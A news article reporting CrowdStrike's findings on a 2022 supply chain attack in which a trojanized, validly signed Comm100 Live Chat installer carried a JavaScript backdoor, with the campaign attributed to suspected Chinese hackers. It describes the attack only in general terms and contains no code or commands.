3 October 2022

Popular commercial chat provider compromised to spread malware in supply chain attack


Popular commercial chat provider compromised to spread malware in supply chain attack

Suspected Chinese hackers have hijacked installer for widely used software to distribute malware in what appears to be a supply chain attack similar to the SolarWinds compromise, a new report from cybersecurity firm CrowdStrike revealed.

The attack targeted Vancouver-based customer service company Comm100, which provides chat services on websites and social media. The hacking campaign involved malware that was deployed via a trojanized installer for the Comm100 Live Chat app signed using a valid Comm100 certificate dated September 26, 2022. According to Comm100’s website, the company claims to have more than 15,000 customers in 51 countries.

The installer is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive. This backdoor downloads and executes a second-stage script, which provides the threat actor with remote shell that allows to install additional malware.

According to CrowdStrike, the attack occurred from at least September 27, 2022 through the morning of September 29, 2022. Organizations affected include companies in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe. Although CrowdStrike did not reveal how many companies were hit, people familiar with the situation cited a dozen known victims. 

The researchers believe that a Chinese threat actor was responsible for this attack based on several factors, such as the “presence of Chinese-language comments in the malware,” the use of Alibaba infrastructure to host C2 servers, and the use of tactics, techniques and procedures (TTPs) linked to previous attacks “targeting of online gambling entities in East and Southeast Asia” that has long been the area of interest for Chinese hackers.

Back to the list

Latest Posts

Microsoft: Russia combines missile and cyberattacks in Ukraine

Microsoft: Russia combines missile and cyberattacks in Ukraine

In parallel with cyber threat activity Russia would likely conduct influence operations targeting Europe to undermine military and humanitarian assistance to Ukraine.
5 December 2022
Spanish police dismantle 'Black Panthers' SIM swap group

Spanish police dismantle 'Black Panthers' SIM swap group

The scammers stole about €250,000 from nearly 100 victims.
5 December 2022
Google releases emergency security update to fix Chrome zero-day bug

Google releases emergency security update to fix Chrome zero-day bug

With the new update the tech giant fixed the ninth Chrome zero-day since the start of 2022.
5 December 2022